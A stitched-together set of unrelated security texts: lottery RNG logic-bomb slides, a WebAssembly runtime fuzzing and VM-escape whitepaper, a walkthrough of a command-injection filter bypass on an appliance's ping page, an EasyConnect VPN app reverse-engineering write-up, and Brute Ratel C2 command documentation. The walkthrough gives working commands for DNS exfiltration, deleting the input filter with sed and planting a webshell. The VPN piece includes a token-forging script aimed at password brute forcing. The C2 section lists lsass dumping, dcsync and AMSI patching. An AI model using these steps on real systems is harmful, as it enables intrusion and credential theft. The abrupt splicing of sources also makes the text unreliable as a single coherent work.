was contracted to perform imaging of one of the rigged lottery RNGs • In 2016 after Eddie was convicted SeNet was given permission to review the RNG images • Eddie didn’t seem smart enough to write a rootkit which could change lottery numbers in memory • So despite the official explanation (which he was convicted off of) for how he rigged the lottery I assumed he simply slipped some code into the RNG which rigged it… • At this point we only had the binaries (no source code) © SeNet International Corp. 2017 30 July 2017 SeNet Reverse Engineering • The RNG consisted of an executable (QV.EXE) which contained the front-end material • A DLL (QVRNG.DLL) which contained the PRNG • And a DLL (AWRAND.DLL) which interfaced with the hardware RNG • QVRNG.DLL was an obvious first choice for an RNG rigger • So I looked at QVRNG.DLL first • I briefly skimmed through all of the functions. One of them caught my eye… © SeNet International Corp. 2017 31 July 2017 SeNet Logic Bomb © SeNet International Corp. 2017 32 July 2017 SeNet Logic Bomb (Cont.) • At this point we also knew that all of the alleged illicit lottery wins related to the case were on two different days: November 23rd and December 29th (November 22nd and December 28th on leap years) • So this function full of references to date checks and the PRNG internals was pretty suspicious • Also the function was at the end of the binary (as if it had been tacked on to the end of a source file) which was suspicious • At this point we were able to obtain the source code for the RNG • Sure enough there were 25 functions in the source code and 26 functions in the binary © SeNet International Corp. 
Logic Bomb (Cont.)
• The date calls corresponded to the two known dates of lottery rigging
• Plus one additional date: May 27th (May 26th on leap years)
• Additional conditions for the RNG rigging were identified and correlated with known illicit winnings
• For example, the RNG was only rigged on Wednesdays and Saturdays
Logic Bomb (Cont.)
• The method by which the function reseeded the RNG with predictable numbers was identified
• Basically he just took various game parameters, including the number of numbers per draw and the maximum and minimum numbers in the game, and multiplied them together along with the number 39 and the summed ASCII values of the letters in the computer name. Then he took that, added it to the day of the year, and added in the product of the number of times the RNG had run since the last reboot and the year.
• This number is then used to seed the PRNG.
• Then he drew a quantity of numbers from the RNG corresponding to the quantity of numbers which had been drawn since the RNG last restarted. The last number drawn was then used to seed the PRNG a second time.
Why didn't certification work?
• The RNG was certified by one of the major testing labs
• The certification ran the output of the RNG through statistical tests to ensure unbiased results…
• But the output of the rigged RNG was statistically unbiased
• The lab performed an audit of the source code…
How he could have done it better
• Rigging the lottery on only three dates made it easier to identify illegal winnings
• Making numbers dependent on variables like the computer name and time of day meant he had to buy multiple tickets for each drawing
• The method of rigging the RNG could have been more discreet
How can this be prevented in the future?
• RNG source code should undergo in-depth third-party reviews
• The binaries (including updates) should be compiled and checked (e.g. via BinDiff) against the binaries provided by the RNG vendor
• The machine itself should be imaged and configured either by a third party or in a supervised manner
Russian slot machine hacking
https://www.wired.com/2017/02/russians-engineer-brilliant-slot-machine-cheat-casinos-no-fix/
https://www.youtube.com/watch?v=W_vdoaKsP5Y (Willy Allison, World Game Protection Conference)
Russian slot machine hacking (cont.)
• Slot machine software was reversed engineered and a weakness discovered in the PRNG • Phones were used to record about 24 spins • Data uploaded and using video footage they were able calculate the pattern based on the slots PRNG • Information is transmitted to a custom app with a listing of timing marks that cause the mobile to vibrate 0.25 seconds before the spin button should be pressed • Not always successful, but the result is higher payout than expected How did they do this? © SeNet International Corp. 2017 44 July 2017 SeNet Russian slot machine hacking (cont.) Video Demonstration © SeNet International Corp. 2017 45 July 2017 SeNet What casinos and operators can do to protect themselves • Understand that compliance != security • Similar to other verticals more budget needs to be spent on information security • Operators need to question game manufacturers on their security controls © SeNet International Corp. 2017 46 July 2017 SeNet Current gaming regulations with security components • Maryland Gaming Commission requires an annual IT Security Assessment be performed by an independent and approved 3rd party on an annual basis. • New Jersey Division of Gaming Enforcement has written in their iGaming standard that a security assessment be performed once a year on the iGaming platforms. Also includes other requirements such as auditing, password complexity, etc… • Various tribal Minimum Internal Controls (MICs), however, these are typically very high-level. • Also your typical regulatory compliance standards (i.e. PCI) • Often left up to the operator to determine what level of security is implemented. © SeNet International Corp. 2017 47 July 2017 SeNet Conclusion While regulated iGaming has added additional controls there is still room from improvement (both from operators and regulators). In our opinion a major risk exists in the code and SDLC process (this is an area that is not really examined by regulators). With gaming (all formats) becoming more widely accepted across the United States it is important the operators and regulators works together to protect the integrity of the games. © SeNet International Corp. 2017 48 July 2017 SeNet Questions
Cyberpeace Whitepaper
Is WebAssembly Really Safe? - Wasm VM Escape and RCE Vulnerabilities Have Been Found in a New Way
July 19, 2022 – Version 1.0
Prepared by Zhao Hai(@h1zhao) Zhichen Wang Mengchen Yu Lei Li

Abstract
WebAssembly (Wasm) defines a binary format which provides languages such as C/C++, C# and Rust with a compilation target on the web. It is a web standard with active participation from all major browser vendors (Chrome, Edge, Firefox, Safari). Wasm runtimes are also widely used for edge computing. Previous research on Wasm security mostly focuses on exploitation at the compiler and linker level, but few people focus on Wasm VM escape. Therefore, we design a new fuzzing framework based on the Wasm standard to explore the runtime vulnerabilities themselves. The framework is compatible with any program or project that implements the Wasm design standard. If there is an escape vulnerability in the browser kernel or in any project that uses a Wasm runtime, an attacker who deploys a page or service containing a malicious Wasm binary can take control of the visiting device or of the server that provides the runtime service. We find that these escape vulnerabilities are usually caused by inadequate operand boundary checking in the bytecode interpreter or by stack overflows in the WASI API. For example, in the wasm3 and WasmEdge projects we used these two methods to achieve VM escape. Meanwhile, there are many exploitable vulnerabilities in the parsing of the file data structure, usually overflows caused by inadequate checking of some input fields; normally these vulnerabilities lead to denial-of-service attacks. In the process of fuzzing, we find that almost all Wasm runtime projects contain such exploitable vulnerabilities. Finally, we will show the off-by-one vulnerability in a PC stack of WasmEdge that we discovered, which achieves RCE on the host. The process is very ingenious and we will explain it in detail during the demo.

Table of Contents
1 Introduction
2 WASM
2.1 WASM Structure
2.2 WASM S-Expression
2.3 WASM Virtual Machine
3 WASM-Fuzzer
4 WASM-Runtime
4.1 WASM3
4.2 WasmEdge
5 Conclusions
9 1 Introduction 天虞实验室 TianYu Lab 3 WebAssembly is a technology developed by a W3C Community Group.The initial goal was to allow the developers to take their native C/C++ code to the browser, making the websites ran more faster.WebAssembly runs code in the virtual machine, so it is cross platform like Java.Now wasm is used in more fields, in the embedded field, it can be used to write platform independent programs,in the field of cloud computing, it can be used for program isolation, similar to docker. Therefore, it is significant to research WebAssembly Security. WebAssembly make the code runs safe, because it separate control flow stack and data stack. During execution, only the data stack can be modified, the control flow stack is fixed during parsing stage.So when a C/C++ program with a buffer overflow vulnerability compiled to wasm bytecode, it can’t be exploitable. The summary is that all vulnerability overflows occur in the data stack and will not have any impact on the program flow stack.WebAssembly System Interface is a interface for WebAssembly to use System APIS, such as file operations, network.WASI is restricted by permissions, so it’s safe. Previous research on wasm security mostly focuses on exploitation at the compiler and linker level, but few people focus on wasm virtual machine escape.Our research focus on wasm virtual machine’s vulnerability,we design a fuzzing tool to find vulnerabilities. Why we design a new fuzzing framework rather than existing fuzzing tool ? The wasm file has a certain data structure. When the wasm runtime validates, only the wasm samples that pass the validation can be executed in the next step. The samples generated by traditional tools such as AFL are raw binary files do not have contextual dependencies, which leads to no correlation between data structures, and the effect is not ideal.We analyse the wasm virtual machine’s structure,there are three possible vulnerabilities in wasm virtual machine: one is the parser of wasm file, the second is the interpretation and execution of byte code of wasm, and the third is the WASI API. Our fuzzing tool is also designed based on these situations. We found some exploitable vulnerabilities in wasm virtual machine. we will introduce the wasm virtual machine’s architecture, we will show the vulnerability existed in wasi api and exploit it. we will show how to use bytecode to spray the heap, from a bytecode off by one to get code executions. 2 WASM 天虞实验室 TianYu Lab 4 2.1 WASM Structure Wasm consists of many sections, the CODE section stores wasm bytecode, the import section stores some imports’ name string, the wasi is also imported from import section. 2.2 WASM S-Expression The S-Expression can be understood by human beings,it’s just like this same as the wasm binary, it consists of many sections. The wasm bytecode is stack-based, for example, i32.const 16191 will push value 16191 to stack. i32.add will pop two values from stack to add and then push the result to stack. 2.3 WASM Virtual Machine (module (memory $0 1) (export "memory" (memory $0)) (export "main" (func $main)) (func $main (; 1 ;) (result i32) (i32.const 16191) ) ) 3 WASM-Fuzzer 5 天虞实验室 TianYu Lab We focus on wasm file structure、wasi api、bytecode implemention in runtime.We develop a wasm sample generator.It constructs samples in sections,abstracts each section into a class structure and maintain it. The design of generator adopts the idea of object-oriented, and splits the data structure of the entire WASM. 
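To connect the S-expression above with the section layout described in 2.1, the following sketch hand-assembles roughly the same module in the binary format (a memory plus an exported main returning i32.const 16191). It is an illustration based on the public WebAssembly binary encoding, not the authors' generator, and it emits the module section by section, which is essentially what a structure-aware sample generator has to do.

# Hand-assemble a minimal .wasm module: magic, version, then sections, each of which
# is (section id, LEB128 payload size, payload).
import struct

def uleb128(n):
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        if n:
            out.append(byte | 0x80)
        else:
            out.append(byte)
            return bytes(out)

def sleb128(n):
    out = bytearray()
    while True:
        byte = n & 0x7F
        n >>= 7
        done = (n == 0 and not byte & 0x40) or (n == -1 and byte & 0x40)
        out.append(byte if done else byte | 0x80)
        if done:
            return bytes(out)

def section(sec_id, payload):
    return bytes([sec_id]) + uleb128(len(payload)) + payload

type_sec = section(1, b"\x01" + b"\x60" + b"\x00" + b"\x01\x7f")      # one type: () -> i32
func_sec = section(3, b"\x01" + b"\x00")                              # one function, using type 0
mem_sec = section(5, b"\x01" + b"\x00" + uleb128(1))                  # one memory, min 1 page
exports = (b"\x02"
           + b"\x06" + b"memory" + b"\x02\x00"                        # export "memory" (memory 0)
           + b"\x04" + b"main" + b"\x00\x00")                         # export "main" (function 0)
export_sec = section(7, exports)
body = b"\x00" + b"\x41" + sleb128(16191) + b"\x0b"                   # no locals; i32.const 16191; end
code_sec = section(10, b"\x01" + uleb128(len(body)) + body)

module = b"\x00asm" + struct.pack("<I", 1) + type_sec + func_sec + mem_sec + export_sec + code_sec
open("main.wasm", "wb").write(module)

A generator only has to vary the payload bytes inside each section while keeping the id/size framing consistent, which is the same per-section framing the fuzzer design in the next section builds on.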
Wasm is composed of a variety of different sections, then design different classes to handle different sections, and each object is responsible for its own small part sample generation. For the code section, it mainly stores some wasm bytecodes. Each bytecode is designed with a corresponding class, which is responsible for obtaining data from Random and generating some required operands. This class will also add some rules to limit the scope of the operand. The operand of some bytecode may depend on some other objects in wasm, it's needed to design a Context class to store some context-related data for other objects to use, and finally output the binary data corresponding to this bytecode into the sample. The quality of the sample generator directly affects the fuzz effect. In a data structure, if some places are constants, there is no need to detect new paths for mutation. For example, the API name of Wasi is some fixed strings, and mutation of these strings has no effect, so it is fixed; For example, if a field is a CRC check value, it cannot be generated correctly by random mutation, so you need to calculate the CRC of the data according to the rules and fill in the field later. The value of some fields is limited to a range, such as a string variable whose value is limited to a random one in the ["apple", "banana"] list, so the field only needs to be selected from the list when it is generated. In the sample generator, we have implemented our own strategic random number generator. 3 WASM-Fuzzer 6 天虞实验室 TianYu Lab For example, in the algorithm in the figure above, according to previous experience, the most likely problem of integers is integer overflow, which often occurs near the boundary of integers. Therefore, it is necessary to make the probability of boundary values greater. Range in the figure is a random number generator, and which value to return is selected according to the value of range. Similarly, we encapsulate the generation algorithms of some basic data types, such as integer64, short, float32, float64, etc., and use strategic methods to make their boundary values appear more frequently. When the sample generator runs independently, the value of range comes from /dev/urandom, which is random. However, if you want to add it to AFL, libfuzzer and other tools and support coverage guidance, you only need to change the data source of range to read from the original binary data generated by AFL, libfuzzer and other tools. That is, all values are no longer autonomously random, but based on the samples of the fuzzer tool, which is equivalent to establishing a data mapping. Each data in the original data of the fuzzer tool uniquely corresponds to a state in the sample generator, which makes it possible for the sample generator to guide based on coverage. When the value of data is not enough, return the constant 0 instead of reading a data randomly from /dev/urandom, which is to ensure the uniqueness of the mapping. If the value of data is not enough to return a random number randomly, for the same data, the state it brings to the whole sample generator is not unique, and the coverage guidance cannot be completed. 4 WASM-Runtime 7 天虞实验室 TianYu Lab 4.1 WASM3 Wasm3 uses a _pc stack and _sp stack, where the pc stack stores a series of runtime functions and parameters corresponding to opcode the parameter in _pc stack uses slot index, which represents the parameter in the subscript in _sp, in the runtime function, from the value of the parameter was read in _sp. 
Among them the data operations in wasm bytecode are in _sp stack, _sp stack only stores data, so stack overflow in the traditional sense, such as the operation similar to memcpy(buf, P, 0x10000) implemented by wasm bytecode, cannot affect the program flow of wasm bytecode. Therefore, the design of wasm is safe, but if there is a problem with the wasm runtime itself, it will be unsafe. For example, in the process of runtime compile, a handle needs 3 slots, but the compiler calculates the number of slots as 2 incorrectly, so the third slot value is the address of the next handle, and this value is used as a subscript to access _sp stack, which is a bytecode level vulnerability we found. Wasm runtime is a virtual machine, so the idea of virtual machine escape can be used for reference. Virtual machines often escape through the vulnerabilities of 4 WASM-Runtime 8 天虞实验室 TianYu Lab various devices. Under many wasm runtime, Wasi APIs are implemented. These APIs work on the host, so you can find such API vulnerabilities. 4.2 WasmEdge The structural design of wasedge is also the separation of data stack and execution stack. In the execution stack, there are a series of instruction objects. We discovered the off by one vulnerability of a PC stack in wasedge, and successfully conducted rce, from an off by one to a complete exp. this process is very clever, and we will explain it in detail at the demonstration meeting. 5 Conclusions 9 天虞实验室 TianYu Lab The wasm standard is designed to be secure, but the wasm runtime is not entirely secure. The escape trigger of the Wasm VM is usually based on the bytecode interpreter and the WASI API, so we must focus on these two modules when designing. It's suggested to add more tests to check for bugs in these two aspects, strictly check the operands of opcode, and strictly check the parameters passed in by wasi api. We will further study more wasm runtime projects in the future, and provide more support for related project security.
pdf
Preface
I ran into an interesting Linux command execution bypass today and want to share it.
A network appliance's admin backend has a Ping feature. The command execution has no echo, but a dnslog service receives the request, so ICMP and DNS traffic can get out:
`whoami`.dnslog
When pushing the command execution further, it turns out there is a lot of filtering that replaces characters with nothing.

First bypass step: read the source with cp.
ping.php contains a parameter-filtering function and executes the command with exec(), which is why there is no echo. Following the files pulled in by include necessarily leads to the file holding the filter function.
cp ping.php ping.txt
cd ..\ncd ..\ncd ..\ncd ..\ncd model\ncp filter.php filter.txt
The filter looks like this:
$val = str_replace("<", "", $val);
$val = str_replace(">", "", $val);
$val = str_replace("/", "", $val);
$val = str_replace("+", "", $val);
$val = str_replace("'", "", $val);
$val = str_replace("\"", "", $val);
$val = str_replace(";", "", $val);
$val = str_replace("?", "", $val);
$val = str_replace("%", "", $val);
$val = str_replace(")", "", $val);
$val = str_replace("(", "", $val);
$val = str_replace(":", "", $val);
$val = str_replace("&", "", $val);
$val = str_replace("|", "", $val);

Second bypass step: delete the filtering lines with sed.
which shows that wget exists, but trying wget reveals that TCP cannot get out. Then sed came to mind: it can insert, delete and replace, but inserting or replacing PHP code would require punctuation, so instead delete the filtering code inside the filter function (take a cp backup first):
cd ..\ncd ..\ncd ..\ncd ..\ncd model\nsed -i 4d filter.php

Finally, write a shell.
Start with a one-liner; phpinfo shows PHP 5.2, so do not pick AES as the encryption in your webshell client, or simply upload a full-featured shell directly.
cmd=file_put_contents('2.php', base64_decode('xxxxxxxx');

Other ideas
Another thought at the time: the backend also has a log feature, so the shell could be written into a log file and then cp'd into the web directory. Since the sed approach worked, I never tried it.
I would like to hear what other workable ideas people have. *cupped-fist salute*.jpg
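As a quick way to vet payloads offline before firing them at the device, the PHP filter quoted above can be replayed locally. The sketch below re-implements the same str_replace chain in Python (the character list is copied from filter.php as shown above) and confirms that a newline-separated cp command passes through untouched; since the application hands the result to exec(), each line then runs as a separate shell command.

# Local replica of the ping.php / filter.php character filter.
BLOCKED = ['<', '>', '/', '+', "'", '"', ';', '?', '%', ')', '(', ':', '&', '|']

def apply_filter(value):
    for ch in BLOCKED:
        value = value.replace(ch, "")
    return value

payload = "127.0.0.1\ncp ping.php ping.txt"
filtered = apply_filter(payload)
print(filtered)
print("payload survives filter:", filtered == payload)

Note that newlines, dots, hyphens and backticks are all absent from the blocked list, which is exactly what the dnslog probe and the cp/sed steps rely on.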
1. Overview

Recently I needed to reverse Sangfor's Easyconnect.apk. It is not packed but is obfuscated, and the native (so) layer abandons the system's entire networking framework, using a self-compiled OpenSSL for all subsequent communication with the server (all screenshots have been heavily redacted). Thanks to the Kanxue advanced research course; please point out any mistakes.

2. Analysis of the server-connection requests

When connecting to a server, two requests are sent one after another. Looking at the first one: start by hooking the onClick event with a script, which reveals the implementing ConnectActivity:

[WatchEvent] onClick: com.sangfor.vpn.client.phone.ConnectActivity

Stepping into o(): after o() calls showDialog(10) to display a dialog, it creates a cb object and starts an async task. The task calls the cb object's a(). Following the b() method, where arg2 is the URL: once the URL passes its checks, execution enters ConnectActivity's a() method, which sets the relevant parameters and then calls l(). l() concatenates the URL and creates a new async task, whose doInBackground() calls ConnectActivity.a(). a() mainly calls HttpConnect.requestStringWithURL(), which ultimately reaches the native method httpRequest(). Based on later analysis, arg1 is the URL, arg2 the cookie information such as TWFID, arg3 the content to transmit, arg4 whether it is a POST, arg5 the follow-up encryption/verification mode, and arg6 the HTTP version.

Next, onPostExecute sends the second request to the server. Stepping into its a() method, it likewise calls ConnectActivity.a(). Following b(), the function creates a thread; inside the thread function, note that v2.put("mobileid", u.f().b()) sends the mobileid along to the server at https://ip:port/por/login_auth.csp?dev=android-phone&language=zh_CN, and httpRequest() is finally called to send the packet. When the second request is sent, the mobileid is first fetched from memory: v2 is a HashMap, and the value is pushed into it before httpRequest is called. Stepping into b(): it returns the value of f; searching for references shows that f is the result of nDeprecatedEncryptMobileId() passed through a(). Stepping into a(), the function mainly takes the MD5 of the passed-in parameter. So we hook nDeprecatedEncryptMobileId and obtain its mobileid and return value:

("27b3d55fdc6e0c60")
"P\u0004\u0006\u0006QSQ\u0005R\u0006\u0006\u0006\u0006S\u0004\u0007"

Looking back at how the mobileid is produced: it is first taken out of a map. Searching for where it is assigned and stepping into c() leads to the assignment of this.g, which first calls e() to check whether a telephony module is present, and if so calls getDeviceId().

3. Analysis of the login request

Next comes the login request packet. Using the sending function found above, we hook it first. Note that the response to the second packet contains <TwfID>xxxxxxxxxxx</TwfID>; this value is saved in the cookie and sent along at login time:

Ver — the current software version
mobileid — the MD5'd value, fixed
TWFID — the value returned by the second request to the server, kept in the cookie afterwards
MOBILETWFID — identical to TWFID
svpn_name / svpn_password — the account name and password

Stepping into the so that holds the function: the so bundles a self-compiled OpenSSL, but the symbols are still present. We first tried hooking libc with a script — because the so bundles its own OpenSSL and calls libc's write and read directly rather than going through libssl's ssl_write/bio_write and ssl_read/bio_read, hooking libc only captures the corresponding ciphertext. Hooking SSL_write() and SSL_read() in libhttps.so instead yields the plaintext before SSL processing: the first connection request and its response, the second request and its response, and the login request carrying the username and data together with its response.

We can therefore construct a mobileid, request https://ip:port/por/login_auth.csp to obtain a TWFID, and then use frida to actively call httpRequest with that TWFID against https://ip:port/por/login_psw.csp for brute forcing.
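Based on the hooked values above, the mobileid that reaches the server appears to be a plain MD5 digest, so requesting a fresh TWFID with a forged device ID could look roughly like the sketch below. This is my own illustration; the parameter encoding of login_auth.csp is an assumption and should be confirmed against the SSL_write plaintext captured above.

import hashlib
import requests       # pip install requests
import urllib3

urllib3.disable_warnings()

BASE = "https://ip:port"             # target EasyConnect server (placeholder)
fake_device_id = "864690020000000"   # arbitrary IMEI-style value
mobileid = hashlib.md5(fake_device_id.encode()).hexdigest()

# Assumption: parameters go in a normal POST form, mirroring the hashmap (v2) seen in b().
resp = requests.post(
    BASE + "/por/login_auth.csp?dev=android-phone&language=zh_CN",
    data={"mobileid": mobileid},
    verify=False,
)
print(resp.status_code)
print(resp.text)                     # expect <TwfID>...</TwfID> in the response body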
BRC4 - Brute Ratel Customized Command and Control Center Ratel War Room Ratel Server - TeamServer API Ratel War Room is an API driven server which works over HTTP and WebSocket Start Mode Ratel Mode Ratel mode is the core server mode which interacts with badgers, starts listener and is your main C2 communication channel. Boomerang Mode In Boomerang mode, the server acts as a standalone socks and HTTPS proxy server. APIs /access /status /task Brute Commander Warmongers - Users Add Warmonger C4 profiles {   "admin_list": {       "admin": "admin@123"   },   "user_list": {       "brute": "password@123",       "ratel": "password@123"   } } Delete Warmonger Reset Warmonger Warmonger List Covert Communication C4 Profilers export import C4 Profiler - Listners Add Listeners Create Listener C4 Profiler->Add Listener C2 Authentication Common Authentication for all badgers OTA or One Time Authentication View Authentication Change Authentication Stop Listener Hosted Files Add New URI Listener Actions->Add New URI Host Files Listener Actions->Host File View Hosted C4 Profiler->Hosted Files Root Page Manager C4 Profiler->Change Root Page C4 Profiler - Payload Payload Profiles via Brute Commander HTTP SMB TCP Payload Profiles via C4 Profilers {   "payload_config": {       "main_http": {           "c2_auth": "abcd@123",           "c2_uri": [               "content.php",               "admin.php"           ],           "extra_headers": {               "Cache-Control": "no-cache",               "Connection": "close",               "Cookie": "AUTH-1babbba6265ca2eba78b65bda5e34545c32a95b2; Version=default; id=a3fWa; Expires=Thu 31 Oct 2021 07:28:00 GMT;",               "Pragma": "no-cache",               "Referer": "https://mail.microsoft.com",               "x-pm-apiversion": "3",               "x-pm-appversion": "Web_3.16.33", Badger Management - Beacon Management Badger Console double clicking a badger or right clicking and selecting the Load button Process Manager               "x-pm-uid": "d0e1f5b0dc08202064de25a",               "Host": "test.azureedge.net"           },           "host": "10.10.10.1",           "port": "443",           "ssl": true,           "type": "HTTP",           "useragent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0"       },       "main_tcp": {           "c2_auth": "abcd@123",           "host": "127.0.0.1",           "port": "10000",           "type": "TCP"       },       "main_smb": {           "c2_auth": "abcd@123",           "smb_pipe": "\\\\.\\pipe\\mynamedpipe",           "type": "SMB"       }   } } Pivot Graph Riot Control You can send commands to multiple badgers simultaneously via a single console with Riot Control Kill Switch Activate KillSwitch Activating Kill Switch will activate exit command for all active badgers. Arsenal loadr - load reflective DLLs command GUI Crypt Vortex Crypt Vortex is a ransomware simulation reflecive DLL which uses a custom encryption algorithm to encrypt the files. encryption decryption LDAP Sentinel The LDAP Sentinel is a LDAP quering reflective DLL which provides a graphical user interface on Commander to query Active Directory for different objects and attributes. tons of prebuilt queries Socks Bridge Socks Bridge is a reflective DLL which can be injected to any process. It is a connecter which connects to Boomerang’s HTTP/HTTPS Socks Server. 
Start socksbridge Using socksbridge C4 Profiler - Command Register Command Profiler DLL Register PE Register {   "register_dll": {       "boxreflect": {           "file_path": "server_confs/boxreflect.dll",           "description": "Loads a test reflective dll message box",           "artifact": "WINAPI",           "mainArgs": "NA",           "optionalArg": "NA",           "example": "boxcheck",           "minimumArgCount": 1,           "replace_str": {               "boxit": "\\x00\\x00\\x00\\x00\\x00",               "!This program cannot ": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0 0",               "be run in DOS mode.": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"           }       }   } } {   "register_pe": {       "seatbelt": {           "file_path": "server_confs/Seatbelt.exe",           "description": "Runs Seatbelt C# executable",           "artifact": "WINAPI",           "mainArgs": "NA",           "optionalArg": "NA",           "example": "seatbelt",           "minimumArgCount": 1       }   } } PIC Register Autoruns C4 profile GUI C4 Profiler->Autoruns Click Scripts C4 Profiler->Clickscripts {   "register_obj": {       "o_getprivs": {           "file_path": "server_confs/getprivs.o",           "description": "Get privilege of current user",           "artifact": "WINAPI",           "mainArgs": "NA",           "optionalArg": "NA",           "example": "o_getprivs",           "minimumArgCount": 1       }   } } {   "autoruns": [       "sleep 60 30",       "set_child werfault.exe",       "id",       "get_privs",       "dcenum"   ] } Create a click script via profile Run a click script "click_script": {   "Credential Dumping": [       "samdump",       "shadowclone",       "dcsync"   ],   "Discovery": [       "id",       "pwd",       "ipstats",       "psreflect echo $psversiontable",       "net users",       "scquery"   ] } Command Transmission Brute Ratel uses a custom encryption algorithm between the badgers and the c4 server. This encryption is performed using a random key that the user provides. If a user does not provide an encryption key, the service generates it dynamically. Server Credential Manager Add/Import/Remove Credentials Server->Add Credentials Make Token Server->Save All Credentials Download Manager Server->View Downloads Log Viewer Server->View Logs Scratchpad User Activity Log Server->User Activity MITRE Team Activity Brute Ratel MITRE Map Server Config->Brute Ratel MITRE Map Watchlist Event Viewer Latest Web Activity Statistics Command Queue PsExec Config *C4 Profiler->PsExec Config* Scratchpad Adversary Simulation Adversary simulation JSON file Satrt adversary simulation C4 Profiler->Load Simulation Badgers References Process Injections/PPID Spoofing/Arguement Spoofing v0.1 run Executes a windows process and returns output of the target process. This command can be used alongside set_parent and set_arguement to change the parent process and spoof commandline arguements v0.1 loadr Loads a reflective DLL into a remote process memory. The target process in which the DLL will be injected can be changed using set_child. 
The parent process can be spoofed using set_parent v0.1 set_child Changes the target process which gets injected with DLL or PE when using loadr, psreflect, sharpreflect or other Brute Ratel Arsenal modules v0.1 set_parent Changes the parent process ID which gets spoofed when using loadr, psreflect, sharpreflect, run or other Brute Ratel Arsenal modules v0.1 get_child Gets the target process set for reflective DLL injection or C# PE injection v0.1 get_parent Gets the parent process ID set for reflective DLL injection, C# PE injection or any other process creation v0.1 clear_child Sets child process to null. Commands dependent on injection will return error v0.1 clear_parent Sets parent process ID to 0. Commands dependent on injection and process creation will use badger’s process ID as parent v0.1 pcinject Injects a new http/tcp/smb payload using an existing payload configuration to a given process id v0.2 shinject Load position independent shellcode into a remote process v0.1 psreflect Injects a powershell reflective DLL loader to a remote process to run powershell commands without running powershell.exe process using the Unmanaged PowerShell technique. The powershell loader patches AMSI to evade basic signatures v0.1 psclean Clears any powershell script loaded to memory for powershell reflection v0.1 psimport Loads a powershell script to memory which can be Invoked using psreflect v0.1 sharpreflect Injects a C# reflective DLL loader to a remote process to run C# PE in memory v0.1 camouflage Injects a reflective PE to a remote process which requests user credentials with a windows-security-styled pop-up and returns captured user credentials v0.1 set_arguement Sets spoofed commandline argument for run command by modifying the PEB. Every process created will use this as spoofed argument until clear_arguement is used. Using this without understanding the limitations of command-line arguement spoofing might stop processes from executing when using the run command v0.1 clear_arguement Clears spoofed commandline argument for run command v0.1 get_arguement Gets spoofed commandline argument set for run command v0.1 cryptvortex Encrypts a given directory/file to simulate ransomware features v0.2 objexec Loads a relocatable object file in memory and executes them in the memory of the badger v0.2 set_objectpipe Sets the name of the namedpipe to fetch output from objexec v0.2 get_objectpipe Gets the name of the namedpipe used to fetch output from objexec v0.4.1 set_malloc Sets the memory allocation and writing technique for process injection v0.4.1 get_malloc Gets the memory allocation and writing technique for process injection v0.4.1 set_threadex Sets the thread execution technique for process injection v0.4.1 get_threadex Gets the thread execution technique for process injection v0.1 run Executes a windows process and returns output of the target process. 
This command can be used alongside set_parent and set_arguement to change the parent process and spoof commandline arguements v0.4.2 dll_block Enables process mitigation policy to block non-microsoft signed dlls from loading into remotely created process v0.4.2 dll_unblock Disables process mitigation policy to block non-microsoft signed dlls from loading into remotely created process v0.1 dcenum Enumerates basic domain information v0.1 ldapsentinel (Accessible via GUI) Provides a GUI interface to query domain objects and has a predefined set of ldap queries v0.1 cd Changes directory and supports SMB navigation v0.1 ls Lists directory contents and supports SMB navigation v0.1 lsdr Lists drives in the current system v0.1 socksbridge (Accessible via GUI) Connects to Boomerang’s socks server v0.1 pivot_smb Connects to SMB badger over named pipe and uses custom encryption of Brute Ratel for communication v0.1 pivot_tcp Starts TCP listener on the badger and uses custom encryption of Brute Ratel for communication v0.1 stop_tcp Stops a TCP listener on the badger v0.1 list_pivot Lists pivot badgers for current badger v0.3 *psexec Execute a payload configuration on remote host by creating a remote badger service using RPC v0.3 *sccreate Creates a service on local or remote host using RPC v0.3 *scdelete Deletes a service on local or remote host using RPC v0.4.1 *scdivert Changes the service binary path for an existing service over local or remote host using RPC v0.5 *pivot_winrm In-memory implementation of WinRM to run WMI queries v0.5 *get_wmiconfig Return configured WMI namespace and user credentials for ‘wmispawn’ command v0.5 *set_wmiconfig Configures WMI namespace, domain username and password for ‘wmispawn’ command v0.5 *reset_wmiconfig Resets configured WMI namespace and user credentials for ‘wmispawn’ command v0.5 *wmispawn Runs a wmi query while using the wminamespace, username and password configured from ‘set_wmiconfig’ command. Default configuration is ‘ROOT\CIMV2’ Domain Enumeration Lateral Movement/Remote Host Enumeration Privilege Escalation/Enumeration v0.1 id Gets current user name v0.1 dumpclip Gets current user’s clipboard data v0.1 get_privs Gets full user privileges v0.1 *get_system Attempts to escalate privilege from Admin to SYSTEM/NT AUTHORITY v0.1 *system_exec Attempts to execute a process with SYSTEM privileges if the current user is in high integrity level v0.1 *set_debug Sets debug privileges required for querying several WinAPIs v0.1 net Supports running predefined net-based user/group enumeration without using running net.exe v0.1 *samdump Dumps NTLM hashes from SAM for all users in the local system v0.1 *shadowclone Dumps Lsass.exe memory using stealth techniques v0.1 make_token Creates a user token using domain name, username and password v0.1 revtoken Reverts a user token to self v0.5 *mimikatz Reflection enabled mimikatz by Benjamin Delphy. Can run usual mimikatz commands v0.5 dcsync Dump password hashes from a domain controller. Optionally takes an argument to dump only a single user’s hash. Can be used with an impersonated token v0.5 *dcsync_inject Injects dcsync module to a remote process and dumps password hashes from a domain controller. Optionally takes an argument to dump only a single user’s hash. 
